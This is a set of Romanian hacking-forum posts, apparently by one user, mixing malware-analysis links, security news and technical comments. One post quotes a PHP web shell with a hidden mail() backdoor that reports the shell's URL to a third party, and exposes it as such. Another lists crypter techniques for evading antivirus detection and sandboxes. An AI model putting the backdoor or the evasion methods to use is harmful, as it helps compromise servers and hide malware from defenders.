Nytro

Ce facea mai bine zis. Pe scurt: "transforma" un executabil detectabil intr-unul nedetectabil.

Security and Data Protection in a Google Data Center Nu e tocmai un tutorial, dar sunt lucruri interesante. Durata: 07:01 (cred ca gasiti voi 7 minute sa il vizionati) Youtube: http://www.youtube.com/watch?v=1SCZzgfdTBo&feature=player_embedded

Da ba, sa stiti ca plecati si sar strainii cu banii pe voi... Cum ajungeti acolo or sa va roage cu bani, pentru ca... ? Nu stiu, voi stiti. Ce credeti ca e peste hotare? Nu e nimic: nu tu familie, nu tu rude, nu tu prieteni, nu ii pasa nimanui de voi. In tara, daca ai o problema, ai la cine sa apelezi. Acolo esti pe cont propriu. Nu cred ca e tocmai paradisul... Credeti ca banii pica din cer? Voi ganditi?

Ban permanent. Infectie.

Malware Analysis: Rootkits (Video) Good video explaining rootkits using hxdef. Part 1 http://video.google.com/videoplay?docid=-1098574092821901542&q=source:015021726083819226340&hl=en Part 2 http://video.google.com/videoplay?docid=4452554918423531934&q=source:015021726083819226340&hl=en Part 3 http://video.google.com/videoplay?docid=-1835297762554988848&q=source:015021726083819226340&hl=en Sursa: http://www.hackhound.org/forum/index.php?/tutorials/article/244-malware-analysis-rootkits-video/

PHP Security This Tutorial covers Cross Site Scripting (XSS), Cross Site Forgery Requests (CSFR), SQL Injection, globals, and much more! Video (46:42): http://videos.code2design.com/video/play/PHP/11

Probabil e magicul j1c0. Cred ca ai venit aici numai la caterinca si nu cred ca vei rezista mult cat sunt eu prin preajma.

Windows 8: Advanced Task Manager-ul dezvaluit de Bianca Dinu | 21 aprilie 2011 Ultimul build al lui Windows 8, aflat in mainile dezvoltatorilor a condus la aparitia unei noi serii de screenshot-uri, care ne dezvaluie de data aceasta noul Advanced Task Manager al sistemului de operare. Cele doua screenshot-uri par sa evidentieze doua tipuri diferite de manager, unul optimizat pentru editia touch, iar celalalt standard. Prima imagine dezvaluie dashboard-ul aplicatiei, care le ofera utilizatorilor mult mai multe informatii despre procesele care ruleaza, serviciile si resursele sistemului. Procesele sunt listate acum intr-o interfata colorata, care ii va permite utilizatorului sa vada care dintre ele incarca cel mai mult sistemul. Al doilea screenshot reprezinta o alta versiune a Task Manager-ului, cu un puternic accent touch-friendly, care prezinta o lista de programe, utilizatori si itemi start-up. Ultimele screenshot-uri Windows 8 vin sa completeze o serie lunga de leak-uri, care au dezvaluit fanilor cateva feature-uri esentiale ale platformei. Si cum mai sunt inca multe de aflat, stay tuned pentru noi detalii Windows 8. Sursa: http://www.hit.ro/software/Windows-8-Advanced-Task-Manager-ul-dezvaluit

Fisierul din acea arhiva incepe asa: <?php # Web Shell by oRb $eu=1; while ($eu==1){ $url=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; mail ("yo_cristy_lov3_boy@yahoo.com","shell",$url); $eu++; } Adica (lasand stupiditatea acelui while) trimite un mai cu link-ul shell-ului astuia: yo_cristy_lov3_boy Adica nu mie ci unui cocalar. PS: Sunt total impotriva spamului.

Daca nu prea stii VB cum ai de gand sa modifici codul existent? Sunt diverse moduri de a face un crypter nedetectabil: modul in care sunt apelate API-urile necesare rularii executabilului in memorie, clasic sau dinamic. La dinamic poti sa cryptezi numele functiilor apelate, dar nu ajuta prea mult. Se poate adauga cod inutil pentru a evita anumite semnaturi pentru anumite zone de cod. Se poate pune o mica intarziere la executia programului pentru a scapa de sandboxu antivirusilor. Sunt multe lucruri de care trebuie tinut cont, si nu e deloc usor.

Bancuri Un roman a spart serverele Agentiei Spatiale Europene. In timp ce facea curat le-a lovit cu coada maturii. Pe o pagina de Facebook.

Reverse Code Engineering: An In-Depth Analysis of the Bagle Virus Author: Konstantin Rozinov 1. INTRODUCTION.......................................................................................................................3 2. BASIC X86 CONCEPTS................................................................................................................3 2.1. REGISTERS......................................................................................................................4 2.2. ASSEMBLY.......................................................................................................................5 2.3. RUNTIME DATA STRUCTURES..................................................................................................7 2.4. THE STACK......................................................................................................................9 3. VIRUS OVERVIEW...................................................................................................................12 3.1. VIRUS HISTORY...............................................................................................................12 3.2. VIRUS TYPES..................................................................................................................12 4. BAGLE VIRUS DISASSEMBLY.......................................................................................................13 4.1. OVERVIEW.....................................................................................................................13 4.2. ANALYSIS RESOURCES.......................................................................................................14 4.3. DISASSEMBLY APPROACH....................................................................................................16 4.4. ANALYSIS PROBLEMS AND SOLUTIONS.....................................................................................19 4.5. FUNCTIONAL FLOW...........................................................................................................22 5. CONCLUSIONS......................................................................................................................26 APPENDIX A: DETAILED DISASSEMBLY OF BAGLE VIRUS.............................................................................29 APPENDIX B: SOURCE CODE LISTING OF BAGLE VIRUS...............................................................................72 Download: http://www.binary-auditing.com/downloads/011%20-%20malware%20analysis/3%20Bagle%20A%20Virus/bagle_analysis_v.1.0.pdf

Go Null Yourself E-Zine #4 0x01 Introduction 0x02 Feedback + Edits 0x03 Lattice-Based Cryptography rattle 0x04 duper's Code Corner duper 0x05 The Tech Behind Credit Cards K141 0x06 Brief Notes on Kiosk Hacking storm 0x07 Linux Rootkit Dev Update duper 0x08 MapReduce, Part 2 elchupathingy 0x09 Cameras + DVRs Scan storm 0x0a 303-833-00xx Scan Shadytel, Inc 0x0b bit.ly Shenanigans Silks, elchupa 0x0c Programming Challenge storm 0x0d The Scoop on LIGATT 0x0e Et Cetera, Etc. teh crew Download: http://www.exploit-db.com/papers/17184/

European Space Agency – Full Disclosure realizat de Tinkode într-o zi cu semnifica?ie în domeniu ESA.INT, pagina oficial? a Agen?iei Spa?iale Europene, are probleme de securitate, probleme ce au fost eviden?iate de Tinkode, unul dintre cei mai mediatiza?i români care se ocup? de publicarea datelor confiden?iale pentru accesarea paginilor web ale unora dintre cele mai mari nume ale industriei IT ?i nu numai. Accesul ob?inut de acesta i-a permis s? extrag? conturi de editori, administratori, FTP ?amd. Nimic impresionant pân? aici, având în vedere activitatea sa din ultima perioad?. Întâmplarea face ca ieri, 17 aprilie, a fost ziua în care este s?rb?torit? reîntoarcerea lui Apollo 13 pe p?mânt dintr-o misiune. Dac? nu era suficient asta, acesta a publicat datele de autentificare ale exact 13 conturi de FTP ce ne duce cu gândul la o misiune ce a avut o ?int? clar?. Din nou, presa vuie?te ?i atât. Mai multe detalii pe blogul s?u. Sursa: http://www.worldit.info/noutati/european-space-agency-full-disclosure-realizat-de-tinkode-intr-o-zi-cu-semnificatie-in-domeniu/ Softpedia: http://news.softpedia.com/news/European-Space-Agency-Website-Hacked-195487.shtml

Contine resurse: - SQLite (asta nu sunt sigur daca e DLL sau EXE) - XMLite (extended module) - un DLL pentru sunete cred, BASS nu stiu cum In plus: "FileDescription", "iStealer" "FileVersion", "6, 1, 0, 0" Deci nu e 6.3. Asadar, nu sunt sigur ca e curat.

Hackers Wanted File name: Hackers Wanted [unreleased Director's Cut].avi File description: Hackers Wanted File size: 699.08 MB Download: http://www.megaupload.com/?d=ZF1MXDFT Megavideo: http://www.megavideo.com/?d=ZF1MXDFT Tocmai l-am vazut, e foarte interesant. Descrie bine termenii de hacker (blackhat, whitehat, grayhat) in sensuri la care probabil nu va ganditi. Sunt multe lucruri interesante, vi-l recomand. Singura problema e ca nu are subtitrare, dar ar trebui sa va descurcati cu engleza.

Sper ca ai o explicatie buna. E un server de Radmin v2.1 in arhiva SFX.

Funtioneaza doar pe messenger 8.0. Doar multi-messenger merge pe versiunile mai noi. Deci nu cred ca e prea util.

Sa fie asta cel mai interesant tutorial pe care il puteti gasi aici? Sau preferati sa nu va ridicati deloc nivelul cunostintelor cu ceva, sa zicem, mai "complex"?

Trebuia sa te astepti la astfel de replici cand ai postat.

Probabil. Adica nu stiu cum s-ar putea face un program cu suport pentru toate tastaturile posibile, dar probabil nu e deloc usor. Dar cred ca e de ajuns unul care suporta tastaturile "standard".

Ai un "eval" acolo, care apeleaza o functie de decryptare. Functia decrypteaza totul, si returneaza rezultatul pentru a fi evaluat. Un simplu "document.write" sau un "alert" in loc de acel return e de ajuns pentru a vedea rezultatul si pentru a nu fi rulat. Dar link-ul e catre un JS mai complex si cu care am avut probleme, cred ca a fost prost scris. Daca nu o sa am ce face o sa incerc sa vad ce face, dar e ceva cod si imi e lene. Ideea de baza cu Facebook e urmatoare: pui fraieru sa ruleze cod JavaScript, poti face pe Facebook-ul lui cam tot ce ar putea face el, in afara doar de chestiile "sociale" ca: recunoaste persoana "x" sau coduri CAPTCHA sau cine stie ce altceva ce necesita o urma de inteligenta.

if(GetAsyncKeyState(i)&1 ==1) Nu are keyboard hook, va consuma ceva procesor, foloseste metoda clasica: verifica pentru fiecare tasta in parte daca e apasata, nu seteaza un hook pentru a primi o "notificare" in caz ca e apelata o tasta. Si e cam prost scris. Adica e stupid sa scrii un fisier ".reg" pentru a scrie in Registry cand exista Registry API, si de asemenea, sa uploadezi pe FTP cu un fisier ".bat" cand exista Winsock si protocolul FTP e tot stupid. Dar na, e mult mai usor asa de aceea probabil au fost preferate aceste alternative. Ideea principala e ca nu vi-l recomand, nici sa il folositi, si sa il studiati nici nu se pune problema.

W3Schools sunt de rahat, articolele sunt scrise cu picioarele de non-programatori. M-am uitat acum (la intamplare) si vad asta la PHP: The $_GET Function De cand e $_GET functie? Sa fim seriosi, sunt niste porcarii acolo.

W3Schools sunt de rahat, articolele sunt scrise cu picioarele de non-programatori. M-am uitat acum (la intamplare) si vad asta la PHP: The $_GET Function De cand e $_GET functie? Sa fim seriosi, sunt niste porcarii acolo.